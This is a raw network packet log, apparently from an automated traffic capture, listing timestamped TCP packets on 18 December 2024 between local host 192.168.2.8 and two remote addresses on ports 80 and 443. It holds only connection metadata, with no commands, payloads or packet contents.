                                                                                                                                                                                          Dec 18, 2024 09:07:19.816811085 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.816862106 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.816889048 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.816905022 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.816948891 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.816992998 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.817675114 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.817723989 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.817723989 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.817739964 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.817768097 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.817800045 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.818540096 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.818588972 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.818608046 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.818660021 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.818666935 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.818717957 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.819498062 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.819513083 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.819528103 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.819551945 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.819586039 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.820285082 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.820333958 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.820395947 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.820411921 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.820450068 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.820482016 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.821127892 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.821178913 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.821199894 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.821216106 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.821245909 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.821279049 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.822033882 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.822061062 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.822077036 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.822087049 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.822123051 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.822123051 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.822860003 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.822909117 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.822945118 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.822962046 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.822990894 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.823024035 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.823729992 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.823776007 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.823796988 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.823820114 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.823839903 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.823864937 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.824749947 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.824798107 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.824843884 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.824887037 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.987440109 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.987500906 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.987513065 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.987545013 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.987559080 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.987593889 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.987608910 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.987608910 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.987628937 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.987644911 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.987674952 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.988046885 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.988099098 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.988107920 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.988185883 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.988189936 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.988224983 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.988797903 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.988847971 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.988900900 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.988934040 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.988945007 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.988977909 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.989392996 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.989425898 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.989439964 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.989461899 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.989474058 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.989509106 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.990046978 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.990096092 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.990096092 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.990113020 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.990134954 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.990154028 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.990729094 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.990776062 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.990791082 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.990806103 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.990832090 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.990848064 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.991591930 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.991647959 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.991681099 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.991695881 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.991728067 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.991740942 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.992408991 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.992448092 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.992482901 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.992499113 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.992527962 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.992539883 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.993277073 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.993340969 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.993367910 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.993382931 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.993411064 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.993419886 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.994124889 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.994168043 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.994215012 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.994230986 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.994259119 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.994271994 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.995378017 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.995426893 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.995450020 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.995465994 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.995493889 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.995548010 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.996234894 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.996280909 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.996315002 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.996330976 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.996355057 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.996366024 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.996985912 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.997030973 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.997066021 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.997103930 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.997127056 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.997134924 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.997687101 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.997733116 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.997770071 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.997785091 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.997812986 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.997824907 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.998490095 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.998531103 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.998564959 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.998580933 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.998610020 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.998620987 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.999375105 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.999422073 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.999443054 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.999459982 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.999483109 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.999490976 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.000207901 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.000253916 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.000297070 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.000313044 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.000346899 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.000359058 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.001075983 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.001121998 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.001167059 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.001183987 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.001204014 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.001215935 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.001961946 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.002015114 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.002031088 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.002047062 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.002077103 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.002088070 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.002846956 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.002887964 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.002899885 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.002914906 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.002948999 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.002962112 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.003686905 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.003730059 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.003765106 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.003781080 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.003806114 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.003823996 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.004575014 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.004617929 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.004893064 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.004940987 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.004990101 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.005006075 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.005039930 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.005728960 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.005776882 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.005811930 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.005829096 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.005851984 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.005862951 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.006745100 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.006789923 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.006819010 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.006834984 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.006860018 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.006870985 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.007731915 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.007774115 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.007788897 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.007806063 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.007821083 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.007833004 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.008471012 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.008517027 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.008554935 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.008569002 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.008596897 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.008606911 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.009206057 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.009248018 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.009304047 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.009320021 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.009346008 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.009358883 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.010077953 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.010123968 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.010169983 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.010185957 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.010214090 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.010226011 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.010957956 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.011020899 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.011030912 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.011045933 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.011065960 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.011074066 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.011872053 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.011923075 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.011975050 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.011991024 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.012015104 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.012027025 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.012686014 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.012731075 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.012742043 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.012758017 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.012777090 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.012787104 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.013555050 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.013612986 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.013632059 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.013648033 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.013675928 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.013686895 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.014413118 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.014481068 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.014563084 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.014579058 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.014602900 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.014615059 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.015338898 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.015391111 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.015399933 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.015415907 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.015439987 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.015461922 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.016166925 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.016212940 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.016252041 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.016305923 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.152975082 CET44349715104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.153110027 CET44349715104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.153198004 CET44349715104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.153202057 CET49715443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:20.153228045 CET44349715104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.153275967 CET49715443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:20.153291941 CET44349715104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.168327093 CET44349715104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.168421030 CET44349715104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.168663979 CET49715443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:20.168725967 CET44349715104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.168977976 CET49715443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:20.177705050 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.177771091 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.177788019 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.177875996 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.178047895 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.178117037 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.178132057 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.178198099 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.178898096 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.178950071 CET4971480192.168.2.831.41.244.11
